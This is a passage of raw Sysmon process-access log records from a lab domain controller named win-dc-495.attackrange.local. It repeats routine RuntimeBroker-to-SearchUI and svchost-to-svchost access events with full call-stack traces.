b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 